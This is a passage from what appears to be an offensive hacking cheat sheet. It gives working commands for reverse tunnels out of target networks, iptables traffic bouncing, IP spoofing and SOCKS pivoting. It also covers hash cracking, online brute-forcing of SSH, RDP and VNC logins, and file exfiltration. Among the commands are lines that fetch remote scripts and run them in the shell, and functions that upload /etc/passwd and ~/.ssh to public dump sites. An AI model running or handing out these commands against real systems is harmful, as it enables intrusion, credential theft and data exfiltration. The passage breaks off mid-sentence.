[serveo.net](https://serveo.net) (free):\n```sh\n# Forward a random public TCP port to localhost:31337\nssh -R 0:localhost:31337 serveo.net\n```\n\nSee also [remote.moe](#revese-shell-remote-moe) (free) to forward raw TCP from the target to your workstation or [playit](https://playit.gg/) (free) or [ngrok](https://ngrok.com/) (paid subscription) to forward a raw public TCP port.\n\nOther free services are limited to forward HTTPS only (not raw TCP). Some tricks below show how to tunnel raw TCP over HTTPS forwards (using websockets).\n\n---\n\u003ca id=\"https\"\u003e\u003c/a\u003e\n**3.iii.b HTTPS reverse tunnels**\n\nOn the server, use any one of these three HTTPS tunneling services: \n```sh\n### Reverse HTTPS tunnel to forward public HTTPS requests to this server's port 8080:\nssh -R80:0:8080 -o StrictHostKeyChecking=accept-new nokey@localhost.run\n### Or using remote.moe\nssh -R80:0:8080 -o StrictHostKeyChecking=accept-new nokey@remote.moe\n### Or using cloudflared\ncurl -fL -o cloudflared https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64\nchmod 755 cloudflared\ncloudflared tunnel --url http://localhost:8080 --no-autoupdate\n```\nEither service will generate a new temporary HTTPS-URL for you to use. \n\nThen, use [websocat](https://github.com/vi/websocat) or [Gost](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) on both ends to tunnel raw TCP over the HTTPS URL:\n\nA. A simple STDIN/STDOUT pipe via HTTPS:\n```sh\n### On the server convert WebSocket to raw TCP:\nwebsocat -s 8080\n```\n```sh\n### On the remote target forward stdin/stdout to WebSocket:\nwebsocat wss://\u003cHTTPS-URL\u003e\n```\n\nB. Forward raw TCP via HTTPS:\n```sh\n### On the server: Gost will translate any HTTP-websocket request to a TCP socks5 request:\ngost -L mws://:8080\n```\n\nForward port 2222 to the server's port 22.\n```sh\n### On the workstation:\ngost -L tcp://:2222/127.0.0.1:22 -F 'mwss://\u003cHTTPS-URL\u003e:443'\n### Test the connection (will connect to localhost:22 on the server)\nnc -vn 127.0.0.1 2222\n```\nor use the server as a Socks-Proxy EXIT node (e.g. access any host inside the server's network or even the Internet via the server (using the HTTPS reverse tunnel from above):\n```sh\n### On the workstation:\ngost -L :1080 -F 'mwss://\u003cHTTPS-URL\u003e:443'\n### Test the Socks-proxy:\ncurl -x socks5h://0 ipinfo.io\n```\n\nMore: [https://github.com/twelvesec/port-forwarding](https://github.com/twelvesec/port-forwarding) and [Tunnel via Cloudflare to any TCP Service](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) and [Awesome Tunneling](https://github.com/anderspitman/awesome-tunneling).\n\n---\n\u003ca id=\"iptables\"\u003e\u003c/a\u003e\n**3.iii.c Bouncing traffic with iptables**\n\nBounce through a host/router without needing to run a userland proxy or forwarder:\n```sh\nipfwinit() {\n echo 1 \u003e/proc/sys/net/ipv4/ip_forward\n echo 1 \u003e/proc/sys/net/ipv4/conf/all/route_localnet\n [ $# -le 0 ] \u0026\u0026 set -- \"0.0.0.0/0\"\n while [ $# -gt 0 ]; do\n iptables -t mangle -I PREROUTING -s \"${1}\" -p tcp -m addrtype --dst-type LOCAL -m conntrack ! --ctstate ESTABLISHED -j MARK --set-mark 1188 \n shift 1\n done\n iptables -t mangle -D PREROUTING -j CONNMARK --restore-mark \u003e/dev/null 2\u003e/dev/null\n iptables -t mangle -I PREROUTING -j CONNMARK --restore-mark\n iptables -I FORWARD -m mark --mark 1188 -j ACCEPT\n iptables -t nat -I POSTROUTING -m mark --mark 1188 -j MASQUERADE\n iptables -t nat -I POSTROUTING -m mark --mark 1188 -j CONNMARK --save-mark\n}\nipfw() {\n iptables -t nat -A PREROUTING -p tcp --dport \"${1:?}\" -m mark --mark 1188 -j DNAT --to ${2:?}:${3:?}\n}\nipfwinit # Allow EVERY IP to bounce\n# ipfwinit \"1.2.3.4/16\" \"6.6.0.0/16\" # Only allow these SOURCE IP's to bounce\n```\n\nThen set forwards like so:\n```sh\nipfw 31337 144.76.220.20 22 # Bounce 31337 to segfault's ssh port.\nipfw 31338 127.0.0.1 8080 # Bounce 31338 to the server's 8080 (localhost)\nipfw 53 213.171.212.212 443 # Bounce 53 to gsrn-relay on port 443\n```\n\nWe use this trick to reach the gsocket-relay-network (or TOR) from deep inside firewalled networks.\n```sh\n# Deploy on a target that can only reach 192.168.0.100 \nGS_HOST=192.168.0.100 GS_PORT=53 ./deploy.sh \n```\n```sh\n# Access the target \nGS_HOST=213.171.212.212 gs-netcat -i -s ...\n```\n\n---\n\u003ca id=\"ghost\"\u003e\u003c/a\u003e\n**3.vi.c Ghost IP / IP Spoofing**\n\nUseful on a host inside the target network. This tool re-configured (without trace) the SHELL: Any program (nmap, cme, ...) started from this SHELL will use a fake IP. All your attacks will originate from a host that does not exist.\n\n```sh\nsource \u003c(curl -fsSL https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/raw/master/tools/ghostip.sh)\n```\n\nThis also works in combination with:\n * [Segfault's ROOT Servers](https://thc.org/segfault/wireguard): Will connect your ROOT Server to the TARGET NETWORK and using a Ghost IP inside the target network.\n * [QEMU Tunnels](https://securelist.com/network-tunneling-with-qemu/111803/): As above, but less secure.\n\n---\n\u003ca id=\"tunnel-more\"\u003e\u003c/a\u003e\n**3.vi.d Various Tunnel Tricks**\n\n### Tunnel via CDN\n * Read [How to tunnel any TCP service via CloudFlare](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) or use [DarkFlare](https://github.com/doxx/darkflare).\n\n### Connect your host directly to the remote network\n * [WireTap](https://github.com/sandialabs/wiretap) - Works as user or root. Uses UDP as transport. ([Try it](https://thc.org/segfault/wireguard) on segfault.)\n * [ligolo-ng](https://github.com/nicocha30/ligolo-ng) - Uses TCP as transport. Works well via [cloudflare CDN](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) or gs-netcat.\n\n### Use SSH as a cheap reverse proxy via Cloudflare\n\nThis method is similar to [HTTPS reverse tunnels](#https) but uses SSH instead of Gost or websocat.\n- Advantage: Only uses *cloudflared* and *SSH* on the target.\n- Disadvantage: Needs a CF subscription.\n\n 1. Go to your CF Dashboard -\u003e Zero Trust -\u003e Networks -\u003e Tunnels\n 2. Create a new 'Cloudflared' tunnel of any name.\n 3. Select Debian \u0026 64-bit. The Token is not fully shown. Extract the \"Token\" by copying the grayed out area into a separate document to reveal the entire Token (the long hex-strings after `sudo cloudflared service install \u003cTunnelTokenHere\u003e`).\n 4. Add a subdomain (example uses `ssh.team-teso.net`).\n 5. Set Type=TCP URL=localhost:22\n\n```shell\n### On YOUR workstation:\ncloudflared tunnel run --token TunnelTokenHere\n```\n\n```shell\n### On the TARGET, create a reverse-SOCKS connection with SSH over Cloudflare:\nssh -o ProxyCommand=\"cloudflared access tcp --hostname ssh.team-teso.net\" root@0 -R 1080\n```\n\n```shell\n### On your workstation, connect to _any_ host within the target network (example: ipinfo.io)\ncurl -x socks5h://0 https://ipinfo.io\n```\nUse [ProxyChains or GrafTCP to tunnel](#scan-proxy) other protocols via the reverse proxy.\n\n\n---\n\u003ca id=\"scan-proxy\"\u003e\u003c/a\u003e\n**3.iv. Use any tool via Socks Proxy**\n\n### Create a tunnel from the target to your workstation using gsocket:\nOn the target's network:\n```sh\n## Create a SOCKS proxy into the target's network.\n## Use gs-netcat but ssh -D would work as well.\ngs-netcat -l -S\n```\n\nOn your workstation:\n```sh\n## Create a gsocket tunnel into the target's network:\ngs-netcat -p 1080\n```\n\n### Using ProxyChain:\n```sh\n## Use ProxyChain to access any host on the target's network: \necho -e \"[ProxyList]\\nsocks5 127.0.0.1 1080\" \u003epc.conf\nproxychains -f pc.conf -q curl ipinfo.io\n## Scan the router at 192.168.1.1\nproxychains -f pc.conf -q nmap -n -Pn -sV -F --open 192.168.1.1\n## Start 10 nmaps in parallel:\nseq 1 254 | xargs -P10 -I{} proxychains -f pc.conf -q nmap -n -Pn -sV -F --open 192.168.1.{} \n```\n\n### Using GrafTCP:\n```sh\n## Use graftcp to access any host on the target's network:\n(graftcp-local -select_proxy_mode only_socks5 \u0026)\ngraftcp curl ipinfo.io\ngraftcp ssh root@192.168.1.1\ngraftcp nmap -n -Pn -sV -F --open 19.168.1.1\n```\n\n---\n\u003ca id=\"your-ip\"\u003e\u003c/a\u003e\n**3.v. Find your public IP address**\n\n```sh\ncurl -s wtfismyip.com/json | jq\ncurl ifconfig.me\ndig +short myip.opendns.com @resolver1.opendns.com\nhost myip.opendns.com resolver1.opendns.com\n```\n\nGet geolocation information about any IP address:\n\n```sh\ncurl https://ipinfo.io/8.8.8.8 | jq\ncurl http://ip-api.com/8.8.8.8\ncurl https://cli.fyi/8.8.8.8\n```\n\nGet ASN information by IP address:\n\n```sh\nasn() {\n [[ -n $1 ]] \u0026\u0026 { echo -e \"begin\\nverbose\\n${1}\\nend\"|netcat whois.cymru.com 43| tail -n +2; return; }\n (echo -e 'begin\\nverbose';cat -;echo end)|netcat whois.cymru.com 43|tail -n +2\n}\nasn 1.1.1.1 # Single IP Lookup\ncat IPS.txt | asn # Bulk Lookup\n```\n\nCheck if TOR is working:\n\n```sh\ncurl -x socks5h://localhost:9050 -s https://check.torproject.org/api/ip\n### Result should be {\"IsTor\":true...\n```\n\n---\n\u003ca id=\"check-reachable\"\u003e\u003c/a\u003e\n**3.vi. Check reachability from around the world**\n\nThe fine people at [https://ping.pe/](https://ping.pe/) let you ping/traceroute/mtr/dig/port-check a host from around the world, check TCP ports, resolve a domain name, ...and many other things.\n\nTo check how well your (current) host can reach Internet use [OONI Probe](https://ooni.org/support/ooni-probe-cli):\n```sh\nooniprobe run im\nooniprobe run websites\nooniprobe list\nooniprobe list 1\n```\n\n---\n\u003ca id=\"check-open-ports\"\u003e\u003c/a\u003e\n**3.vii. Check/Scan Open Ports on an IP**\n\n[Censys](https://search.censys.io/) or [Shodan](https://internetdb.shodan.io) Port lookup service:\n```shell\ncurl https://internetdb.shodan.io/1.1.1.1\n```\n\nFast (-F) vulnerability scan\n```shell\n# Version gathering\nnmap nmap -n -Pn -sCV -F --open --min-rate 10000 scanme.nmap.org\n# Vulns\nnmap -A -F -Pn --min-rate 10000 --script vulners.nse --script-timeout=5s scanme.nmap.org\n```\n\nUsing bash:\n```shell\ntimeout 5 bash -c \"\u003c/dev/tcp/1.2.3.4/31337\" \u0026\u0026 echo OPEN || echo CLOSED\n```\n\n---\n\u003ca id=\"bruteforce\"\u003e\u003c/a\u003e\n**3.viii. Crack Password hashes**\n\n 1. [NTLM2password](https://ntlm.pw/) to crack (lookup) NTLM passwords\n 2. [wpa-sec](https://wpa-sec.stanev.org) to crack (lookup) WPA PSK passwords\n\nHashCat is our go-to tool for everything else:\n```shell\nhashcat my-hash /usr/share/wordlists/rockyou.txt\n```\n\nUsing a [10-days 7-16 char hashmask](https://github.com/sean-t-smith/Extreme_Breach_Masks/) on GPU:\n```sh\ncurl -fsSL https://github.com/sean-t-smith/Extreme_Breach_Masks/raw/main/10%2010-days/10-days_7-16.hcmask -o 10-days_7-16.hcmask\n# -d2 == Use GPU #2 only (device #2)\n# -O == Up to 50% faster but limits password length to \u003c= 15\n# -w1 == workload low (-w3 == high)\nnice -n 19 hashcat -o cracked.txt my-hash.txt -w1 -a3 10-days_7-16.hcmask -O -d2\n```\n\nCrack OpenSSH's `known_hosts` hashes to reveal the IP address:\n```shell\ncurl -SsfL https://github.com/chris408/known_hosts-hashcat/raw/refs/heads/master/ipv4_hcmask.txt -o ipv4_hcmask.txt\ncurl -SsfL https://github.com/chris408/known_hosts-hashcat/raw/refs/heads/master/kh-converter.py -o kh-converter.py\npython kh-converter.py ~/.ssh/known_hosts \u003e~/.ssh/known_hosts_hashes\nhashcat -m 160 --quiet --hex-salt ~/ssh/known_hosts_hashes -a 3 ipv4_hcmask.txt \n```\n\n👉 Read the [FAQ](https://hashcat.net/wiki/doku.php?id=frequently_asked_questions).\n\nBe aware that `$6$` hashes are SLOW. Even the [1-minute 7-16 char hashmask](https://github.com/sean-t-smith/Extreme_Breach_Masks/raw/main/01%20instant_1-minute/1-minute_7-16.hcmask) would take many days on a 8xRTX4090 cluster to complete.\n\nRent a RTX-4090 GPU-Cluster at [vast.ai](https://www.vast.ai) for $0.40/h and use [dizcza/docker-hashcat:cuda](https://hub.docker.com/r/dizcza/docker-hashcat) ([read more](https://adamsvoboda.net/password-cracking-in-the-cloud-with-hashcat-vastai/)).\n\nOtherwise, use [Crackstation](https://crackstation.net), [shuck.sh](https://shuck.sh/), [ColabCat/cloud](https://github.com/someshkar/colabcat)/[Cloudtopolis](https://github.com/JoelGMSec/Cloudtopolis) or crack on your own [AWS](https://akimbocore.com/article/hashcracking-with-aws/) instances.\n\n**3.xi. Brute Force Passwords / Keys**\n\nThe following is for brute forcing (guessing) passwords of ONLINE SERVICES.\n\n\u003ca id=\"gmail\"\u003e\u003c/a\u003e\n\u003cdetails\u003e\n \u003csummary\u003eGMail Imbeciles - CLICK HERE\u003c/summary\u003e\n\n\u003e You can not brute force GMAIL accounts. \n\u003e SMTP AUTH/LOGIN IS DISABLED ON GMAIL. \n\u003e All GMail Brute Force and Password Cracking tools are FAKE.\n\u003c/details\u003e\n\nAll tools are pre-installed on segfault:\n```shell\nssh root@segfaul.net # password is 'segfault'\n```\n(You may want to use your [own EXIT node](https://www.thc.org/segfault/wireguard))\n\nTools:\n* [Ncrack](https://nmap.org/ncrack/man.html)\n* [Nmap BRUTE](https://nmap.org/nsedoc/categories/brute.html)\n* [THC Hydra](https://sectools.org/tool/hydra/)\n* [Medusa](https://www.geeksforgeeks.org/password-cracking-with-medusa-in-linux/) / [docs](http://foofus.net/goons/jmk/medusa/medusa.html)\n* [Metasploit](https://docs.rapid7.com/metasploit/bruteforce-attacks/)\n* [Crowbar](https://github.com/galkan/crowbar) - great for trying all ssh keys on a target IP range.\n\nUsername \u0026 Password lists:\n* `/usr/share/nmap/nselib/data` \n* `/usr/share/wordlists/seclists/Passwords`\n* https://github.com/berzerk0/Probable-Wordlists - \u003eTHC's FAVORITE\u003c\n* https://github.com/danielmiessler/SecLists \n* https://wordlists.assetnote.io \n* https://weakpass.com \n* https://crackstation.net/ \n\n\nSet **U**sername/**P**assword list and **T**arget host.\n```shell\nULIST=\"/usr/share/wordlists/brutespray/mysql/user\"\nPLIST=\"/usr/share/wordlists/seclists/Passwords/500-worst-passwords.txt\"\nT=\"192.168.0.1\"\n```\n\nUseful **Nmap** parameters:\n```shell\n--script-args userdb=\"${ULIST}\",passdb=\"${PLIST}\",brute.firstOnly\n```\n\nUseful **Ncrack** parameters:\n```shell\n-U \"${ULIST}\"\n-P \"${PLIST}\"\n```\n\nUseful **Hydra** parameters:\n```shell\n-t4 # Limit to 4 tasks\n-l root # Set username\n-V # Show each login/password attempt\n-s 31337 # Set port\n-S # Use SSL\n-f # Exit after first valid login\n```\n\n\u003c!--\n```shell\n## HTTP Login\nhydra -l admin -P \"${PLIST}\" http-post-fomr \"/admin.php:u=^USER\u0026p-^PASS\u0026f=login:'Enter'\" -v\n```\n--\u003e\n```shell\n## SSH\nnmap -p 22 --script ssh-brute --script-args ssh-brute.timeout=4s \"$T\"\nncrack -P \"${PLIST}\" --user root \"ssh://${T}\"\nhydra -P \"${PLIST}\" -l root \"ssh://$T\"\n```\n\n```shell\n## Remote Desktop Protocol / RDP\nncrack -P \"${PLIST}\" --user root -p3389 \"${T}\"\nhydra -P \"${PLIST}\" -l root \"rdp://$T\"\n```\n\n```shell\n## FTP\nhydra -P \"${PLIST}\" -l user \"ftp://$T\"\n```\n\n```shell\n## IMAP (email)\nnmap -p 143,993 --script imap-brute \"$T\"\n```\n\n```shell\n## POP3 (email)\nnmap -p110,995 --script pop3-brute \"$T\"\n```\n\n```shell\n## MySQL\nnmap -p3306 --script mysql-brute \"$T\"\n```\n\n```shell\n## PostgreSQL\nnmap -p5432 --script pgsql-brute \"$T\"\n```\n\n```shell\n## SMB (windows)\nnmap --script smb-brute \"$T\"\n```\n\n```shell\n## Telnet\nnmap -p23 --script telnet-brute --script-args telnet-brute.timeout=8s \"$T\"\n```\n\n```shell\n## VNC\nnmap -p5900 --script vnc-brute \"$T\"\nncrack -P \"${PLIST}\" --user root \"vnc://$T\"\nhydra -P \"${PLIST}\" \"vnc://$T\"\nmedusa -P \"${PLIST}\" –u root –M vnc -h \"$T\"\n```\n\n```shell\n## VNC (with metasploit)\nmsfconsole\nuse auxiliary/scanner/vnc/vnc_login\nset rhosts 192.168.0.1\nset pass_file /usr/share/wordlists/seclists/Passwords/500-worst-passwords.txt\nrun\n```\n\n```shell\n## HTML basic auth\necho admin \u003euser.txt # Try only 1 username\necho -e \"blah\\naaddd\\nfoobar\" \u003epass.txt # Add some passwords to try. 'aaddd' is the valid one.\nnmap -p80 --script http-brute --script-args \\\n http-brute.hostname=pentesteracademylab.appspot.com,http-brute.path=/lab/webapp/basicauth,userdb=user.txt,passdb=pass.txt,http-brute.method=POST,brute.firstOnly \\\n pentesteracademylab.appspot.com\n```\n\n---\n\u003ca id=\"exfil\"\u003e\u003c/a\u003e\n## 4. Data Upload/Download/Exfil\n\u003ca id=\"file-encoding\"\u003e\u003c/a\u003e\n\n### 4.i File Encoding\n\nTrick to transfer a file to the target when the target does not have access to the Internet: Convert the binary file into ASCII-text (base64) and then use cut \u0026 paste. (Alternatively use gs-netcat's elite console with `Ctrl-e c` to transfer file over the same TCP connection.)\n\nUse `xclip` (on your workstation) to pipe the encoded data straight into your clipboard:\n```shell\nbase64 -w0 \u003c/etc/issue.net | xclip\n```\n\n\n\n#### \u003e\u003e\u003e UU encode/decode\n\n```sh\n## uuencode \nuuencode /etc/issue.net issue.net-COPY\n```\n\u003cdetails\u003e\n \u003csummary\u003eOutput - CLICK HERE\u003c/summary\u003e\n\n\u003e begin 644 issue.net-COPY \n\u003e 72V%L:2!'3E4O3\u0026EN=7@@4F]L;\u0026EN9PH\\` \n\u003e ` \n\u003e end\n\u003c/details\u003e\n\n```sh\n## uudecode (cut \u0026 paste the 3 lines from above):\nuudecode\n```\n#### \u003e\u003e\u003e base64 encode/decode\n\n```sh\nbase64 -w0 \u003c/etc/issue.net \n```\n\u003cdetails\u003e\n \u003csummary\u003eOutput - CLICK HERE\u003c/summary\u003e\n\n\u003e VWJ1bnR1IDE4LjA0LjIgTFRTCg==\n\u003c/details\u003e\n\n```sh\nbase64 -d \u003eissue.net-COPY\n```\n\n#### \u003e\u003e\u003e Openssl encode/decode\n\n```sh\nopenssl base64 \u003c/etc/issue.net \n```\n\u003cdetails\u003e\n \u003csummary\u003eOutput - CLICK HERE\u003c/summary\u003e\n\n\u003e VWJ1bnR1IDE4LjA0LjIgTFRTCg==\n\u003c/details\u003e\n\n```sh\nopenssl base64 -d \u003eissue.net-COPY\n```\n\n#### \u003e\u003e\u003e xxd encode/decode\n\n```sh\nxxd -p \u003c/etc/issue.net\n```\n\u003cdetails\u003e\n \u003csummary\u003eOutput - CLICK HERE\u003c/summary\u003e\n\n\u003e 4b616c6920474e552f4c696e757820526f6c6c696e670a\n\u003c/details\u003e\n\n```sh\nxxd -p -r \u003eissue.net-COPY\n```\n\n---\n\u003ca id=\"cut-paste\"\u003e\u003c/a\u003e\n### 4.ii. File transfer - using cut \u0026 paste\n\nPaste into a file on the remote machine (note the `\u003c\u003c-'__EOF__'` to not mess with tabs or $-variables).\n```sh\ncat \u003eoutput.txt \u003c\u003c-'__EOF__'\n[...]\n__EOF__ ### Finish your cut \u0026 paste by typing __EOF__\n```\n\n---\n\u003ca id=\"xfer-tmux\"\u003e\u003c/a\u003e\n### 4.iii. File transfer - using *tmux*\n\nStart `tmux` on your workstation. Connect to your target by any means you like (ssh, gs-netcat, ...).\n\n#### From REMOTE to LOCAL (download)\n\nUse [Tmux-Logging](#tmux) to download large files from the target via the terminal to your workstation.\n\n#### From LOCAL to REMOTE (upload)\n\nStart your favorite decoding tool (base64) on the REMOTE:\n```shell\n# Use 'Ctrl-b $' to rename this tmux session to 'foo'\nbase64 -d \u003escreen-xfer.txt\n```\n\nOn your workstation, and from a different terminal, send base64-encoded data. It will arrive on your REMOTE in `screen-xfer.txt`.\n```shell\ntmux send-keys -t foo \"$(base64 -w64 \u003c/etc/issue.net)\"$'\\n'\n# Press 'Ctrl-d' in the receiving terminal.\n# Optional: Use -t foo:1.2 to send to window #1 and pane #2 instead.\n# Optional: Use 'Ctrl-b ,' to rename the window\n```\n\n---\n\u003ca id=\"file-transfer-screen\"\u003e\u003c/a\u003e\n### 4.vi. File transfer - using *screen*\n\n#### From REMOTE to LOCAL (download)\n\nHave a *screen* running on your local computer and log into the remote system from within your shell. Instruct your local screen to log all output to screen-xfer.txt:\n\n\u003e CTRL-a : logfile screen-xfer.txt\n\n\u003e CTRL-a H\n\nWe use *openssl* to encode our data but any of the above encoding methods works. This command will display the base64 encoded data in the terminal and *screen* will write this data to *screen-xfer.txt*:\n\n```sh\n## On the remote system encode issue.net\nopenssl base64 \u003c/etc/issue.net\n```\n\nStop your local screen from logging any further data:\n\n\u003e CTRL-a H \n\nOn your local computer decode the file:\n```sh\nopenssl base64 -d \u003cscreen-xfer.txt\nrm -rf screen-xfer.txt\n```\n\n#### From LOCAL to REMOTE (upload)\n\nOn your local system encode the data:\n```sh\nopenssl base64 \u003c/etc/issue.net \u003escreen-xfer.txt\n```\n\nOn the remote system (and from within the current *screen*):\n```sh\nopenssl base64 -d\n```\n\nGet *screen* to slurp the base64 encoded data into screen's clipboard and paste the data from the clipboard to the remote system:\n\n\u003e CTRL-a : readbuf screen-xfer.txt\n\n\u003e CTRL-a : paste .\n\n\u003e CTRL-d\n\n\u003e CTRL-d\n\nNote: Two CTRL-d are required due to a [bug in openssl](https://github.com/openssl/openssl/issues/9355).\n\n---\n\u003ca id=\"file-transfer-gs-netcat\"\u003e\u003c/a\u003e\n### 4.v. File transfer - using gs-netcat and sftp\n\nUse [gs-netcat](https://github.com/hackerschoice/gsocket) and encapsulate the sftp protocol within. Allows access to hosts behind NAT/Firewall.\n\n```sh\ngs-netcat -s MySecret -l -e /usr/lib/sftp-server # Host behind NAT/Firewall\n```\n\nFrom your workstation execute this command to connect to the SFTP server:\n```sh\nexport GSOCKET_ARGS=\"-s MySecret\" # Workstation\nsftp -D gs-netcat # Workstation\n```\n\nOr to DUMP a single file:\n```sh\n# On the sender\ngs-netcat -l \u003c\"FILENAME\" # Will output a SECRET used by the receiver\n\n# On the receiver\ngs-netcat \u003e\"FILENAME\" # When prompted, enter the SECRET from the sender\n```\n\n---\n\u003ca id=\"http\"\u003e\u003c/a\u003e\n### 4.vi. File transfer - using HTTPs\n\n#### Download from Server to Receiver:\n\nOn the Sender/Server:\n```sh\n## Spawn a temporary HTTP server and share the current working directory.\npython -m http.server 8080 --bind 127.0.0.1 \u0026\n# alternative: php -S 127.0.0.1:8080\ncloudflared tunnel -url localhost:8080\n```\nReceiver: Access the URL from any browser to view/download the remote file system.\n\n#### 1 - Upload using PHP:\n\nOn the Receiver:\n```posh\ncurl -fsSL -o upload_server.php https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/raw/master/tools/upload_server.php\nmkdir upload\n(cd upload; php -S 127.0.0.1:8080 ../upload_server.php \u0026\u003e/dev/null \u0026)\ncloudflared tunnel --url localhost:8080 --no-autoupdate\n```\n\nOn the Sender:\n```posh\n# Set a function:\nup() { curl -fsSL -F \"file=@${1:?}\" https://ABOVE-URL-HERE.trycloudflare.com; }\n# upload files like so:\nup warez.tar.gz\nup /etc/passwd\n```\n\n#### 2 - Upload using PYTHON:\n\nOn the Receiver:\n```posh\npip install uploadserver\npython -m uploadserver \u0026\ncloudflared tunnel -url localhost:8000\n```\n\nOn the Sender:\n```posh\ncurl -X POST https://CF-URL-CHANGE-ME.trycloudflare.com/upload -F 'files=@myfile.txt'\n```\n\n---\n\u003ca id=\"download\"\u003e\u003c/a\u003e\n### 4.vii. File download without curl\n\nUsing Python, download only:\n```sh\n# Declare a curl-alternative\npurl() {\n local url=\"${1:?}\"\n { [[ \"${url:0:8}\" == \"https://\" ]] || [[ \"${url:0:7}\" == \"http://\" ]]; } || url=\"https://${url}\"\n \"$(which python3 || which python || which python2 || which false)\" -c \"\\\nimport urllib.request\nimport sys\nimport ssl\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\nsys.stdout.buffer.write(urllib.request.urlopen(\\\"$url\\\", timeout=10, context=ctx).read())\"\n}\n# purl ipinfo.io\n```\n\nExample: Installing gsocket with purl:\n```sh\n# cut \u0026 paste the above purl() function into your bash. Then cut \u0026 paste the following:\nsource \u003c(purl https://raw.githubusercontent.com/hackerschoice/hackshell/main/hackshell.sh) \\\n\u0026\u0026 bin curl \\\n\u0026\u0026 bash -c \"$(curl -fsSL https://gsocket.io/y)\" \\\n\u0026\u0026 xdestruct\n```\n\nUsing OpenSSL, download only:\n```sh\nsurl() {\n local r=\"${1#*://}\"\n local opts=(\"-quiet\" \"-ign_eof\")\n IFS=/ read -r host query \u003c\u003c\u003c\"${r}\"\n openssl s_client --help 2\u003e\u00261| grep -qFm1 -- -ignore_unexpected_eof \u0026\u0026 opts+=(\"-ignore_unexpected_eof\")\n openssl s_client --help 2\u003e\u00261| grep -qFm1 -- -verify_quiet \u0026\u0026 opts+=(\"-verify_quiet\")\n echo -en \"GET /${query} HTTP/1.0\\r\\nHost: ${host%%:*}\\r\\n\\r\\n\" \\\n\t| openssl s_client \"${opts[@]}\" -connect \"${host%%:*}:443\" \\\n\t| sed '1,/^\\r\\{0,1\\}$/d'\n}\n# surl ipinfo.io\n```\n\nusing Perl, download only:\n```sh\nlurl() {\n local url=\"${1:?}\"\n { [[ \"${url:0:8}\" == \"https://\" ]] || [[ \"${url:0:7}\" == \"http://\" ]]; } || url=\"https://${url}\"\n perl -e 'use LWP::Simple qw(get);\nmy $url = '\"'${1:?}'\"';\nprint(get $url);'\n}\n# lurl ipinfo.io\n```\n\nUsing bash, download only:\n```sh\nburl() {\n IFS=/ read -r proto x host query \u003c\u003c\u003c\"$1\"\n exec 3\u003c\u003e\"/dev/tcp/${host}/${PORT:-80}\"\n echo -en \"GET /${query} HTTP/1.0\\r\\nHost: ${host}\\r\\n\\r\\n\" \u003e\u00263\n (while read -r l; do echo \u003e\u00262 \"$l\"; [[ $l == $'\\r' ]] \u0026\u0026 break; done \u0026\u0026 cat ) \u003c\u00263\n exec 3\u003e\u0026-\n}\n# burl http://ipinfo.io\n# PORT=31337 burl http://37.120.235.188/blah.tar.gz \u003eblah.tar.gz\n```\n\n---\n\u003ca id=\"trans\"\u003e\u003c/a\u003e\n### 4.viii. File transfer using a public dump\n\nCut \u0026 paste into your bash:\n```sh\ntransfer() {\n [[ $# -eq 0 ]] \u0026\u0026 { echo -e \u003e\u00262 \"Usage:\\n transfer [file/directory]\\n transfer [name] \u003cFILENAME\"; return 255; }\n [[ ! -t 0 ]] \u0026\u0026 { curl -SsfL --progress-bar -T \"-\" \"https://transfer.sh/${1}\"; return; }\n [[ ! -e \"$1\" ]] \u0026\u0026 { echo -e \u003e\u00262 \"Not found: $1\"; return 255; }\n [[ -d \"$1\" ]] \u0026\u0026 { (cd \"${1}/..\"; tar cfz - \"${1##*/}\")|curl -SsfL --progress-bar -T \"-\" \"https://transfer.sh/${1##*/}.tar.gz\"; return; }\n curl -SsfL --progress-bar -T \"$1\" \"https://transfer.sh/${1##*/}\"\n}\n```\n\nthen upload a file or a directory:\n```sh\ntransfer /etc/passwd # A single file\ntransfer ~/.ssh # An entire directory\n(curl ipinfo.io; hostname; uname -a; cat /proc/cpuinfo) | transfer \"$(hostname)\"\n```\nA list of our [favorite public upload sites](#cloudexfil).\n\n---\n\u003ca id=\"rsync\"\u003e\u003c/a\u003e\n### 4.ix. File transfer - using rsync\n\nIdeal for synchronizing large amount of directories or re-starting broken transfers. The example transfers the directory '*warez*' to the Receiver using a single TCP connection from the Sender to the Receiver.\n\nReceiver:\n```posh\necho -e \"[up]\\npath=upload\\nread only=false\\nuid=$(id -u)\\ngid=$(id -g)\" \u003er.conf\nmkdir upload\nrsync --daemon --port=31337 --config=r.conf --no-detach\n```\n\nSender:\n```posh\nrsync -av warez rsync://1.2.3.4:31337/up\n```\n\nThe same encrypted (OpenSSL):\n\nReceiver:\n```posh\n# use rsa:2048 if ed25519 is not supported (e.g. rsync connection error)\nopenssl req -subj '/CN=example.com/O=EL/C=XX' -new -newkey ed25519 -days 14 -nodes -x509 -keyout ssl.key -out ssl.crt\ncat ssl.key ssl.crt \u003essl.pem\nrm -f ssl.key ssl.crt\nmkdir upload\ncat ssl.pem\nsocat OPENSSL-LISTEN:31337,reuseaddr,fork,cert=ssl.pem,cafile=ssl.pem EXEC:\"rsync --server -logtprR --safe-links --partial upload\"\n```\n\nSender:\n```posh\n# Copy the ssl.pem from the Receiver to the Sender and send directory named 'warez'\nIP=1.2.3.4\nPORT=31337\n# Using rsync + socat-ssl\nup1() {\n rsync -ahPRv -e \"bash -c 'socat - OPENSSL-CONNECT:${IP:?}:${PORT:-31337},cert=ssl.pem,cafile=ssl.pem,verify=0' #\" -- \"$@\" 0:\n}\n# Using rsync + openssl\nup2() {\n rsync -ahPRv -e \"bash -c 'openssl s_client -connect ${IP:?}:${PORT:-31337} -servername example.com -cert ssl.pem -CAfile ssl.pem -quiet 2\u003e/dev/null' #\" -- \"$@\" 0:\n}\nup1 /var/www/./warez\nup2 /var/www/./warez\n```\n\nRsync can be combined to exfil via [https / cloudflared raw TCP tunnels](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service). \n(To exfil from Windows, use the rsync.exe from the [gsocket windows package](https://github.com/hackerschoice/binary/raw/main/gsocket/bin/gs-netcat_x86_64-cygwin_full.zip)). A noisier solution is [syncthing](https://syncthing.net/).\n\nPro Tip: Lazy hackers just type 